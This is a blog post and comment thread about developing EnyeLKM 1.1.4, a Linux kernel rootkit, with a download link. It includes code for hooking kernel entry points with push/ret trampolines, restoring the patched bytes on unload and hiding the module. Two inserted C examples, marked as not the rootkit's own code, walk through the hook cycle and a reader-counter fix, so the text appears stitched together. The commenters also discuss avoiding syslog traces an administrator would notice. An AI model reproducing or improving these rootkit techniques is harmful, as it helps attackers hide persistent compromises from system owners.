EnyeLKM 1.1.4


http://www.fr33project.org/projects/enyelkm-1.1.4.rar

New module: restore_memory.c. The module can now save the memory that the jumps overwrite and restore it later, when the module is unloaded (before this, the module could not be unloaded at all).

/* init: build the push/ret jump to new_idt, back up the bytes at p
   it will overwrite, then write it */
create_push_ret( &push_ret, (unsigned long) new_idt );
save_memory( (unsigned long) p, &backup_memory );
write_push_ret( (void *) p, &push_ret );

LKM's cleanup function:

restore_memory( &backup_memory );   /* put the original bytes back */
__dev_remove_pack( &my_pkt );
/* let processes that are 'reading' finish */
while ( read_activo != 0 || can_unload_lkm != 1 )
    schedule();

Modification at idt:

void new_idt( void )
{
    can_unload_lkm = 0;   /* a redirected call is in flight: block unload */
    ...
    can_unload_lkm = 1;
    JmPushRet( after_call )   /* push/ret jump on to after_call */
}

The traffic light (can_unload_lkm) is there in case any redirected system call is still executing when the module is being unloaded.
P.S.: to try it, comment out the function hide_module().
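The save/write/restore cycle the snippets above sketch, as an added example that is not EnyeLKM's own code. It assumes the 32-bit x86 "push imm32; ret" encoding (6 bytes), and the struct layouts, the decode helper, the fake_text sample bytes and the hook_cycle() driver are all invented here. It runs on a user-space byte buffer standing in for kernel text; a real module would additionally have to make the page writable (e.g. clear CR0.WP) before writing, which is not shown.

```c
/* Added example (not EnyeLKM code): build a 32-bit x86 "push imm32; ret"
 * trampoline, back up the bytes it overwrites, install it, and restore them.
 * Everything happens in a user-space byte buffer standing in for kernel text;
 * the real module would also have to clear CR0.WP (or otherwise make the
 * page writable) before writing, which is not shown here. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PUSH_RET_LEN 6           /* 68 imm32 (5 bytes) + C3 ret (1 byte) */

struct push_ret {
    uint8_t bytes[PUSH_RET_LEN];
};

/* Backup keeps the patched address too, so restore needs only the backup
 * (as in restore_memory(&backup_memory) above). Layout is an assumption. */
struct backup {
    uint8_t *addr;
    uint8_t  bytes[PUSH_RET_LEN];
};

/* push <target>; ret  ==  jmp <target> without clobbering a register */
void create_push_ret(struct push_ret *pr, uint32_t target)
{
    pr->bytes[0] = 0x68;                    /* push imm32 */
    memcpy(&pr->bytes[1], &target, 4);      /* little-endian immediate (LE host assumed) */
    pr->bytes[5] = 0xC3;                    /* ret */
}

void save_memory(uint8_t *p, struct backup *b)
{
    b->addr = p;
    memcpy(b->bytes, p, PUSH_RET_LEN);
}

void write_push_ret(uint8_t *p, const struct push_ret *pr)
{
    memcpy(p, pr->bytes, PUSH_RET_LEN);
}

void restore_memory(const struct backup *b)
{
    memcpy(b->addr, b->bytes, PUSH_RET_LEN);
}

/* Decode: if p holds a push/ret trampoline, store its target and return 1.
 * This is also the check a detector would run over a handler's first bytes. */
int decode_push_ret(const uint8_t *p, uint32_t *target)
{
    if (p[0] != 0x68 || p[5] != 0xC3)
        return 0;
    memcpy(target, &p[1], 4);
    return 1;
}

/* Stand-in for the first bytes of a kernel entry handler: constructed
 * sample bytes, not real kernel code. */
static uint8_t fake_text[16] = {
    0x55, 0x89, 0xE5, 0x53, 0x56, 0x57, 0x83, 0xEC,
    0x10, 0x8B, 0x45, 0x08, 0x85, 0xC0, 0x74, 0x05
};

/* Full cycle as the module does it on init and cleanup. Returns 1 if the
 * hook decoded back to new_handler, bytes past the patch were untouched,
 * and the text is byte-identical after restore. */
int hook_cycle(uint32_t new_handler)
{
    uint8_t original[sizeof fake_text];
    struct push_ret pr;
    struct backup bk;
    uint32_t seen = 0;

    memcpy(original, fake_text, sizeof fake_text);

    create_push_ret(&pr, new_handler);      /* init: build trampoline */
    save_memory(fake_text, &bk);            /* init: back up overwritten bytes */
    write_push_ret(fake_text, &pr);         /* init: install hook */

    int hooked = decode_push_ret(fake_text, &seen) && seen == new_handler
                 && memcmp(fake_text + PUSH_RET_LEN, original + PUSH_RET_LEN,
                           sizeof fake_text - PUSH_RET_LEN) == 0;

    restore_memory(&bk);                    /* cleanup: put the bytes back */
    return hooked && memcmp(fake_text, original, sizeof fake_text) == 0;
}

int main(void)
{
    printf("hook/restore round trip: %s\n",
           hook_cycle(0xC0101234u) ? "ok" : "FAILED");
    return 0;
}
```

The point of keeping the address inside the backup is that cleanup then cannot restore to the wrong place: whatever save_memory() recorded is exactly what restore_memory() writes back.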


Posted by David Reguera Garcia

3 Responses to “EnyeLKM 1.1.4”

  1. RaiSe Says:

    Hi. As I told you through MSN, there is a mess, made by me, in hacked_read(): the semaphore read_activo cannot be a binary one; as my OS teacher would say, there is a clear mutual exclusion problem XD. read_activo has to be a counter initialised to 0: when a process enters a read it increments it, and when it exits it decrements it. As it is now, a process could easily be inside its blocked read with read_activo at 0. If possible, it would be better for read_activo to be of type atomic_t, to avoid mutual exclusion problems and to look cooler :). Apart from that, the load/unload is perfect; the only failure is that a process could be blocked inside our hacked_read() with read_activo set to 0, the module unloads, and when, for example, Enter is pressed (bash) it gets unblocked, its eip is restored to where it was in our hacked_read(), which no longer exists, it takes a page fault and the process crashes, leaving a long list of messages in the syslog that even the most absent-minded administrator would notice haha. Greetings ;).
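The problem described in the comment above, as an added example that is not part of this thread or of EnyeLKM: a binary "reader inside" flag beside the counter the comment asks for, driven through the scenario of one reader blocked in hacked_read() while another enters and leaves. The enter/leave functions, the flag_* and counter_* names and the polling wait are invented here; the kernel version would use atomic_t with atomic_inc()/atomic_dec() rather than C11 atomics, and schedule() rather than a spin.

```c
/* Added example (not EnyeLKM code): why a binary "reader inside" flag is not
 * enough to gate module unload, and the counter the comment describes. The
 * read path is simulated in user space with enter/leave calls. */
#include <stdatomic.h>
#include <stdio.h>

/* --- the broken version: one flag shared by every reader --- */
static int read_activo_flag;                /* 1 = "someone is in hacked_read" */

void flag_enter(void) { read_activo_flag = 1; }
void flag_leave(void) { read_activo_flag = 0; }
int  flag_can_unload(void) { return read_activo_flag == 0; }

/* --- the fixed version: a counter of readers currently inside --- */
static atomic_int read_activo;              /* zero-initialised */

void counter_enter(void) { atomic_fetch_add(&read_activo, 1); }
void counter_leave(void) { atomic_fetch_sub(&read_activo, 1); }
int  counter_can_unload(void) { return atomic_load(&read_activo) == 0; }

/* Scenario: reader A blocks in hacked_read (e.g. a shell waiting on a tty),
 * reader B enters and leaves. Returns what the gate reports while A is
 * still inside: 1 means "unload allowed", which for the flag is the bug. */
int flag_unload_with_blocked_reader(void)
{
    flag_enter();                /* A enters and blocks */
    flag_enter();                /* B enters */
    flag_leave();                /* B leaves: flag drops to 0 although A is inside */
    int verdict = flag_can_unload();
    flag_leave();                /* A finally leaves (too late if we already unloaded) */
    return verdict;
}

int counter_unload_with_blocked_reader(void)
{
    counter_enter();             /* A enters and blocks: count 1 */
    counter_enter();             /* B enters: count 2 */
    counter_leave();             /* B leaves: count 1, A still inside */
    int verdict = counter_can_unload();
    counter_leave();             /* A leaves: count 0, unload allowed now */
    return verdict;
}

/* The cleanup loop from the post, with the counter: wait until no reader
 * is inside and no redirected handler is mid-flight (can_unload_lkm == 1).
 * In the kernel the loop body would be schedule(); here we poll and give up
 * after a bound so the demo cannot hang. Returns 1 if unload may proceed. */
int wait_until_unloadable(int can_unload_lkm)
{
    int spins = 0;
    while (!counter_can_unload() || can_unload_lkm != 1) {
        if (++spins > 1000)
            return 0;
    }
    return 1;
}

int main(void)
{
    printf("binary flag allows unload with a blocked reader: %d (bug)\n",
           flag_unload_with_blocked_reader());
    printf("counter allows unload with a blocked reader:     %d (correct)\n",
           counter_unload_with_blocked_reader());
    printf("cleanup may proceed once count is 0:             %d\n",
           wait_until_unloadable(1));
    return 0;
}
```

Note that even the counter only closes the window the comment describes; the check-then-unload sequence in cleanup is still not atomic with respect to a reader entering right after the count was observed as 0, so the real module should additionally stop new entries (for example by unhooking first and only then waiting for the count to drain).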

  2. David Reguera Garcia Says:

    Well, anyway, the unload is only for you and me; a priori an LKM does not normally get unloaded. In any case, could you paste your hacked_read? Or shall I implement it? :?

  3. David Reguera Garcia Says:

    I have already implemented it :-), take a look at 1.1.4-fix :-).
